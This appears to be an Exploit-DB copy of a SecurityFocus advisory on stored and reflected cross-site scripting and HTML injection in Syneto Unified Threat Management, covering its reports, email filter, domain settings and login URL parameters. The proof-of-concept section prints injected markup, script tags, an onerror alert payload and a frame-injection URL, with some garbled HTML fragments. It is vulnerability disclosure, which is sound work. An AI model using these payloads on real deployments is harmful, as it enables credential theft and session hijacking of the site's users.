source: https://www.securityfocus.com/bid/51597/info
Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.
Unified Threat Management 1.4.2and1.3.3 Community Edition are vulnerable; other versions may be affected.
Proof of Concept:=================
The vulnerabilities can be exploited by privileged user accounts, lowviewers or remote attackers with required user inter action.
For demonstration or reproduce ...1.1.1[+] Reports - Executive Summery - Output Listing Category
<tr id="list_1"class="tableRowEven"><td class="status" valign="top" align="center"><a href="https://www.exploit-db.com/exploits/36586/#" title="Disable the reporting list"class="disableList"><img src="https://www.exploit-db.com/exploits/36586/img/enabled.gif"
title="disable" alt="disable"class="disable"></a><a style="display: none;" href="https://www.exploit-db.com/exploits/36586/#" title="Enable the reporting list"class="enableList"><img src="https://www.exploit-db.com/exploits/36586/img/disabled.gif" title="enable" alt="enable"class="enable"></a></td><td valign="top">"><EXECUTION OF PERSISTENT SCRIPT CODE!>' <<="" td=""><td valign="top" nowrap="nowrap"><a href="https://www.exploit-db.com/exploits/36586/#"id="list_1"class="editList"><img src="https://www.exploit-db.com/exploits/36586/img/edit.gif" title="Edit" alt="Edit"/></a><a href="https://www.exploit-db.com/exploits/36586/syneto.php?menuid=307&action=delete&id=1"class="deleteList"><;img src="https://www.exploit-db.com/exploits/36586/img/delete.gif" title="Delete" alt="Delete"/></a></td></tr></tbody></table></div>
Reference(s):
https://www.example.com.com/syneto.php?menuid=3071.1.2[+] EMail - Filter Add & Configure
<div>Sender =>"<EXECUTION OF PERSISTENT SCRIPT CODE!">.*</div><div>Receiver =.*</div><div>Subject =.*(SPAM|VIAGRA).*</div>
Reference(s):
https://www.example.com.com/syneto.php?menuid=631.1.3[+] EMail Settings - New Domain
"><table class="data"id="smtpDomainsList"><thead><tr><th class="status">Status</th><th class="domain">Domain</th><th class="routing">Routing</th><th class="verify_sender">Verify sender</th><th class="qdm">Send digest</th><th class="actions">Actions</th></tr></thead><tbody><tr id="domain_3"class="tableRowEven editableDomain "><EXECUTION OF PERSISTENT SCRIPt CODE!><td class="status"><input name="active" value="1"type="hidden"><input name="qdm_enabled" value=""type="hidden"><input name="qdm_hours" value="23"type="hidden"><input name="admin_email" value=""><script>EXECUTION OF PERSISTENT SCRIPt CODE!</script>" type="hidden"><input name="verify_peer" value=""type="hidden"><input name="prefix_digest_links" value=""type="hidden"><EXECUTION OF PERSISTENT SCRIPT CODE!>" /><input name="verify_sender" value=""type="hidden"><input name="verify_sender_network_name" value=""type="hidden"><input name="qdm_exceptions" value=""type="hidden"><input name="whitelist" value=""type="hidden"><input name="blacklist" value=""type="hidden"><img class="clickable tooltip" title="" src="https://www.exploit-db.com/exploits/36586/img/enabled.gif"></td><td class="domain">"><script>alert(vulnerabilitylab)</script></td>
Reference(s):
https://www.example.com.com/syneto.php?menuid=601.2
PoC:
https://www.example.com.com/index.php?error=need_login"'><frame src=http://www.vulnerability-lab.com><hr>&from_menu=238
https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E
Reference(s):
https://www.example.com.com/index.php?error=need_login"'>EXECUTION OF PERSISTENT SCRIPT CODE!<hr>&from_menu=238
https://www.example.com.com/index.php?info=<EXECUTION OF PERSISTENT SCRIPT CODE!>%20%3E
